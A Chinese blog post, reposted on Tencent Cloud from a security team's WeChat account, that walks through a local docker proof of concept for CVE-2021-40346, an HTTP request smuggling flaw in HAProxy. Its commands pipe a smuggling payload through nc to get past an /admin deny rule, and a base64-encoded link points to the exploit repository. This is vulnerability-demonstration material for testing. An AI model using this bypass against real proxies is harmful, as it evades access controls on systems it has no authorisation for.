CVE-2021-40346（HAProxy HTTP 走私）屁噢C

Khan安全团队

发布于 2021-09-18 11:48:44

5240

发布于 2021-09-18 11:48:44

文章被收录于专栏：Khan安全团队

docker启动

$ docker build -t cve-2021-40346 .
$ docker run --name poc -p 8000:80 -d --rm -it cve-2021-40346
4941e9f23508b497e4cbe334a75e7cdb84c83478522ed85f48db3477f97a6fb4

测试：

确认/admin被拒绝。

$ curl http://localhost:8000
hello
$ curl http://localhost:8000/admin
<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

你不会/admin在日志中看到。这意味着请求没有到达后端服务器，因为 HAProxy 拒绝了它。

$ docker logs poc
server start at port 8000
/

然后，您可以确保它可以被 payload.txt 绕过。

$ cat payload.txt | nc localhost 8000
HTTP/1.1 200 OK
content-type: text/plain
date: Wed, 08 Sep 2021 22:31:10 GMT
keep-alive: timeout=5
transfer-encoding: chunked

6
hello

0

你会/admin在日志中找到。

$ docker logs poc
server start at port 8000
/
/
/admin

项目地址：

aHR0cHM6Ly9naXRodWIuY29tL2tucXlmMjYzL0NWRS0yMDIxLTQwMzQ2

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2021-09-10，如有侵权请联系 cloudcommunity@tencent.com 删除

容器镜像服务

本文分享自 Khan安全团队微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

登录后参与评论

0 条评论

热度

CVE-2021-40346（HAProxy HTTP 走私）屁噢C

CVE-2021-40346（HAProxy HTTP 走私）屁噢C

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐